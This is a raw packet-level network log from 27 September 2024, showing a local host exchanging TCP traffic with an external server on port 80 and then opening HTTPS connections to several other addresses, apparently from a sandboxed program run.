Sep 27, 2024 01:49:51.377203941 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.377209902 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.377214909 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:51.377228975 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.377239943 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.377250910 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.377264023 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.377273083 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:51.377276897 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.377296925 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:51.377302885 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.377307892 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:51.377312899 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.377322912 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.377334118 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.377341032 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:51.377346039 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.377356052 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:51.377392054 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:51.377454996 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.377468109 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.377477884 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.377487898 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.377499104 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.377505064 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:51.377510071 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.377522945 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.377525091 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:51.377553940 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:51.377572060 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:51.377607107 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.377624989 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.377635956 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.377648115 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.377657890 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.377667904 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:51.377676010 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.377687931 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.377691984 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:51.377711058 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:51.377715111 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.377726078 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.377738953 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:51.377738953 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.377752066 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.377762079 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.377768993 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:51.377779961 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.377793074 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.377815008 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.377820969 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:51.377820969 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:51.377825975 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.377840042 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.377844095 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:51.377866983 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.377873898 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:51.377877951 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.377888918 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.377896070 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:51.377923965 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:51.377934933 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.377944946 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.377955914 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.377966881 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.377974987 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:51.378011942 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:51.378036976 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.378047943 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.378058910 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.378070116 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.378079891 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:51.378081083 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.378092051 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.378109932 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:51.378144979 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:51.378165007 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.378184080 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.378201008 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.378209114 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:51.378211975 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.378245115 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:51.378261089 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.378271103 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:51.378279924 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.378295898 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.378308058 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.378308058 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:51.378319025 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.378324986 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:51.378330946 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.378353119 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:51.378377914 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:51.381071091 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.381129026 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:51.381139994 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.381151915 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.381191969 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:51.381196976 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.381203890 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:51.381208897 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.381226063 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.381236076 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:51.381237984 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.381247997 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.381256104 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:51.381283998 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:51.381303072 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:51.463000059 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.463016033 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.463040113 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.463052034 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.463063002 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.463068008 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:51.463073969 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.463084936 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.463129044 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:51.463129044 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:51.463129044 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:51.463157892 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.463169098 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.463180065 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.463203907 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.463207006 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:51.463215113 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.463222027 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:51.463237047 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.463248968 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:51.463254929 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.463260889 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:51.463267088 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.463278055 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.463285923 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:51.463305950 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.463306904 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:51.463316917 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.463327885 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.463335037 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:51.463339090 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.463351011 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.463360071 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:51.463421106 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.463422060 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:51.463433027 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.463448048 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.463459015 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.463459969 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:51.463469982 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.463480949 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.463490009 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:51.463509083 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:51.463534117 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:51.463571072 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.463591099 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.463596106 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.463618040 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.463629007 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.463634014 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.463639975 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.463644981 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.463649988 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.463655949 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.463689089 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:51.463704109 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.463715076 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.463725090 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.463737011 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.463745117 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:51.463747025 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.463769913 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.463773012 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:51.463781118 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.463783979 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:51.463814020 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:51.463850021 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.463860035 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.463871002 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.463891983 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:51.463920116 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:51.463929892 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.463941097 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.463953018 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.463980913 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:51.464010000 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:51.464078903 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.464090109 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.464099884 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.464108944 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.464119911 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.464119911 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:51.464131117 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.464142084 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.464149952 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:51.464169979 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:51.464191914 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:51.464214087 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.464224100 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.464234114 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.464246035 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.464253902 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:51.464274883 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:51.464292049 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.464293003 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:51.464306116 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.464315891 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.464327097 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.464337111 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.464338064 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:51.464349031 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:51.464402914 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:51.464608908 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.464620113 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.464639902 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.464651108 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:51.464657068 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.464668036 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.464675903 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:51.464678049 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.464703083 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.464705944 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:51.464719057 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.464736938 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.464744091 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:51.464746952 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.464757919 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.464768887 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.464776039 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:51.464782000 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.464799881 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:51.464803934 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.464814901 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.464826107 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.464843988 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:51.464853048 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.464867115 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.464869022 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:51.464876890 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.464886904 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.464888096 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:51.464898109 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.464903116 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:51.464907885 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.464919090 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.464929104 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:51.464936972 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.464946985 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:51.464947939 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.464962006 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.464972019 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.464977026 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:51.464992046 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.465003014 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.465008020 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:51.465020895 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:51.465035915 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.465048075 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.465049028 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:51.465059042 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.465070009 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.465082884 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.465084076 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:51.465091944 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.465102911 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.465111017 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:51.465114117 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.465123892 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:51.465126038 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.465137005 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.465148926 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.465159893 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.465169907 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:51.465183020 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:51.465197086 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:51.467597961 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.467611074 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.467636108 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.467647076 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.467658043 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.467669010 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:51.467674971 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.467685938 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.467716932 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:51.467736006 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:51.549803972 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.549817085 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.549829006 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.549860001 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.549874067 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.549884081 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.549892902 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:51.549896002 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.549906969 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.549917936 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.549927950 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.549941063 CEST	80	49734	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:51.549957991 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:51.549957991 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:51.549981117 CEST	49734	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:51.630033016 CEST	49738	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:49:51.630116940 CEST	443	49738	5.75.211.162	192.168.2.8
Sep 27, 2024 01:49:51.630208969 CEST	49738	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:49:51.630597115 CEST	49738	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:49:51.630620956 CEST	443	49738	5.75.211.162	192.168.2.8
Sep 27, 2024 01:49:51.658879042 CEST	443	49737	172.67.132.32	192.168.2.8
Sep 27, 2024 01:49:51.658945084 CEST	49737	443	192.168.2.8	172.67.132.32
Sep 27, 2024 01:49:51.670742989 CEST	49737	443	192.168.2.8	172.67.132.32
Sep 27, 2024 01:49:51.670754910 CEST	443	49737	172.67.132.32	192.168.2.8
Sep 27, 2024 01:49:51.671189070 CEST	443	49737	172.67.132.32	192.168.2.8
Sep 27, 2024 01:49:51.672955990 CEST	49737	443	192.168.2.8	172.67.132.32
Sep 27, 2024 01:49:51.673187971 CEST	49737	443	192.168.2.8	172.67.132.32
Sep 27, 2024 01:49:51.673219919 CEST	443	49737	172.67.132.32	192.168.2.8
Sep 27, 2024 01:49:52.082439899 CEST	443	49737	172.67.132.32	192.168.2.8
Sep 27, 2024 01:49:52.082535028 CEST	443	49737	172.67.132.32	192.168.2.8
Sep 27, 2024 01:49:52.082633018 CEST	49737	443	192.168.2.8	172.67.132.32
Sep 27, 2024 01:49:52.083287954 CEST	49737	443	192.168.2.8	172.67.132.32
Sep 27, 2024 01:49:52.083303928 CEST	443	49737	172.67.132.32	192.168.2.8
Sep 27, 2024 01:49:52.083314896 CEST	49737	443	192.168.2.8	172.67.132.32
Sep 27, 2024 01:49:52.083321095 CEST	443	49737	172.67.132.32	192.168.2.8
Sep 27, 2024 01:49:52.103889942 CEST	49739	443	192.168.2.8	188.114.96.3
Sep 27, 2024 01:49:52.103918076 CEST	443	49739	188.114.96.3	192.168.2.8
Sep 27, 2024 01:49:52.104011059 CEST	49739	443	192.168.2.8	188.114.96.3
Sep 27, 2024 01:49:52.104737043 CEST	49739	443	192.168.2.8	188.114.96.3
Sep 27, 2024 01:49:52.104753017 CEST	443	49739	188.114.96.3	192.168.2.8
Sep 27, 2024 01:49:52.291790009 CEST	443	49738	5.75.211.162	192.168.2.8
Sep 27, 2024 01:49:52.292205095 CEST	49738	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:49:52.292625904 CEST	49738	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:49:52.292634010 CEST	443	49738	5.75.211.162	192.168.2.8
Sep 27, 2024 01:49:52.294442892 CEST	49738	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:49:52.294450045 CEST	443	49738	5.75.211.162	192.168.2.8
Sep 27, 2024 01:49:52.588998079 CEST	443	49739	188.114.96.3	192.168.2.8
Sep 27, 2024 01:49:52.589107990 CEST	49739	443	192.168.2.8	188.114.96.3
Sep 27, 2024 01:49:52.590614080 CEST	49739	443	192.168.2.8	188.114.96.3
Sep 27, 2024 01:49:52.590624094 CEST	443	49739	188.114.96.3	192.168.2.8
